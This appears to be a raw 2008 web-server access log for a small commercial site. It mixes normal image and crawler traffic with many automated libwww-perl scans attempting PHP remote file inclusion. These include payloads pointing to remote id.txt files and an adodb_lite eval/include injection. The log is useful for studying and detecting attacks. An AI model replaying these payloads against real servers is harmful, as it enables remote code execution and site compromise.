66.172.9.3 - - [03/Oct/2008:01:08:54 -0400] "GET /logs/task.php?task=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
58.227.192.80 - - [03/Oct/2008:01:09:11 -0400] "GET /logs/error_log.Q108092600//twindow_notice.php?shop_this_skin_path=http://www.minart.org/bbs_2/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
58.227.192.80 - - [03/Oct/2008:01:09:11 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.minart.org/bbs_2/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
58.227.192.80 - - [03/Oct/2008:01:09:11 -0400] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.minart.org/bbs_2/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
78.159.111.131 - - [03/Oct/2008:01:09:16 -0400] "GET /logs/access_log.Q108091900%20/main.php?pagina=http://www.propowerfit.com/articledirectory/one.coms?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.214.193.212 - - [03/Oct/2008:01:09:18 -0400] "GET /logs/access_log.Q108060700//bemarket/postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
202.214.193.212 - - [03/Oct/2008:01:09:18 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
202.214.193.212 - - [03/Oct/2008:01:09:18 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
207.216.167.181 - - [03/Oct/2008:01:09:28 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:28 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tenting screw" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
74.52.139.226 - - [03/Oct/2008:01:09:37 -0400] "GET /logs/access_log.Q108090100%20/lostpasswd.php?env[include_prefix]=http://oursoultvxq.com/bbs/data/bbs/idid.txt?????? HTTP/1.1" 404 240 "-" "libwww-perl/5.810"
207.216.167.181 - - [03/Oct/2008:01:09:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:09:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
202.214.193.212 - - [03/Oct/2008:01:11:47 -0400] "GET /logs/error_log.Q108051700//bemarket/postscript/postscript.php?p_mode=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
66.172.9.3 - - [03/Oct/2008:01:11:58 -0400] "GET /task.php?task=http://vnc2009.webcindario.com/chi.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
61.129.78.149 - - [03/Oct/2008:01:12:15 -0400] "GET /?custompluginfile[]=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:12:15 -0400] "GET /logs/access_log.Q108080300/?custompluginfile[]=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:12:15 -0400] "GET /logs/?custompluginfile[]=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 200 68150 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:12:40 -0400] "GET /logs/access_log.Q108063000/?custompluginfile[]=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
209.59.12.99 - - [03/Oct/2008:01:12:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.129.78.149 - - [03/Oct/2008:01:13:12 -0400] "GET /?sIncPath=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:13:17 -0400] "GET /logs/access_log.Q108080300/?sIncPath=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
61.129.78.149 - - [03/Oct/2008:01:13:12 -0400] "GET /logs/?sIncPath=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 200 24059 "-" "libwww-perl/5.814"
76.9.3.130 - - [03/Oct/2008:01:13:25 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:25 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:25 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:28 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:28 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:28 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:29 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:13:31 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
61.129.78.149 - - [03/Oct/2008:01:13:57 -0400] "GET /logs/access_log.Q108063000/?sIncPath=http://www.nm.tm//mysqlbackups/tmp/ididon.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.814"
76.9.3.130 - - [03/Oct/2008:01:15:00 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:00 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:00 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:01 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
66.172.9.3 - - [03/Oct/2008:01:15:11 -0400] "GET /task.php?task=http://vnc2009.webcindario.com/id.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
151.1.24.160 - - [03/Oct/2008:01:15:14 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:15:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:15:14 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
76.9.3.130 - - [03/Oct/2008:01:15:32 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:32 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:32 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
76.9.3.130 - - [03/Oct/2008:01:15:32 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
85.124.248.147 - - [03/Oct/2008:01:16:10 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:01:16:10 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:01:16:10 -0400] "GET /logs/access_log.Q108081200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
85.124.248.147 - - [03/Oct/2008:01:16:19 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.chukaclub.com/zboard/idd.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
207.216.167.181 - - [03/Oct/2008:01:16:54 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:16:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:17:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
207.216.167.181 - - [03/Oct/2008:01:17:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; InfoPath.1)"
74.6.17.176 - - [03/Oct/2008:01:16:45 -0400] "GET /logs/access_log.Q107121900 HTTP/1.0" 200 2934176 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
151.1.24.160 - - [03/Oct/2008:01:17:24 -0400] "GET /logs/error_log.Q108082200//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
209.59.12.99 - - [03/Oct/2008:01:17:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.160.79.6 - - [03/Oct/2008:01:18:27 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
211.160.79.6 - - [03/Oct/2008:01:18:28 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
211.160.79.6 - - [03/Oct/2008:01:18:38 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mufa.erfurt-humor.de/vwar/images/screen/v6id.txt?%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
74.53.127.68 - - [03/Oct/2008:01:19:09 -0400] "GET /logs/access_log.Q108040200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:19:10 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:19:10 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
75.125.146.130 - - [03/Oct/2008:01:19:17 -0400] "GET /logs/access_log.Q108040200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:19:17 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:19:17 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.53.127.68 - - [03/Oct/2008:01:19:41 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
75.125.146.130 - - [03/Oct/2008:01:19:41 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.53.127.68 - - [03/Oct/2008:01:20:25 -0400] "GET /logs/access_log.Q108040200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:20:25 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
74.53.127.68 - - [03/Oct/2008:01:20:25 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
75.125.146.130 - - [03/Oct/2008:01:20:33 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:20:33 -0400] "GET /logs/access_log.Q108040200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
75.125.146.130 - - [03/Oct/2008:01:20:33 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
74.53.127.68 - - [03/Oct/2008:01:20:44 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
75.125.146.130 - - [03/Oct/2008:01:21:06 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://magickalforest.com//includes/idv6.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
151.1.24.160 - - [03/Oct/2008:01:22:30 -0400] "GET /logs/access_log.Q108090600//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:22:30 -0400] "GET //index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
151.1.24.160 - - [03/Oct/2008:01:22:31 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://daemon1337.100webspace.net/id.priv8.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
24.97.13.141 - - [03/Oct/2008:01:22:38 -0400] "GET /logs/access_log.Q108082200/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
24.97.13.141 - - [03/Oct/2008:01:22:42 -0400] "GET /?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
24.97.13.141 - - [03/Oct/2008:01:22:49 -0400] "GET /logs/?custompluginfile%5B%5D=http://www.nepspb.com/images/id6.txt???? HTTP/1.1" 200 68150 "-" "libwww-perl/5.79"
209.59.12.99 - - [03/Oct/2008:01:22:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.114 - - [03/Oct/2008:01:23:16 -0400] "GET /logs/access_log.Q108081600 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.176 - - [03/Oct/2008:01:23:36 -0400] "GET /images/_notes/download_cat_X.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.69.210.130 - - [03/Oct/2008:01:24:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 3M/IE 6.0;; 3M/MSIE 6.0;; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.69.210.130 - - [03/Oct/2008:01:24:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 3M/IE 6.0;; 3M/MSIE 6.0;; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
217.69.210.130 - - [03/Oct/2008:01:24:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; 3M/IE 6.0;; 3M/MSIE 6.0;; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
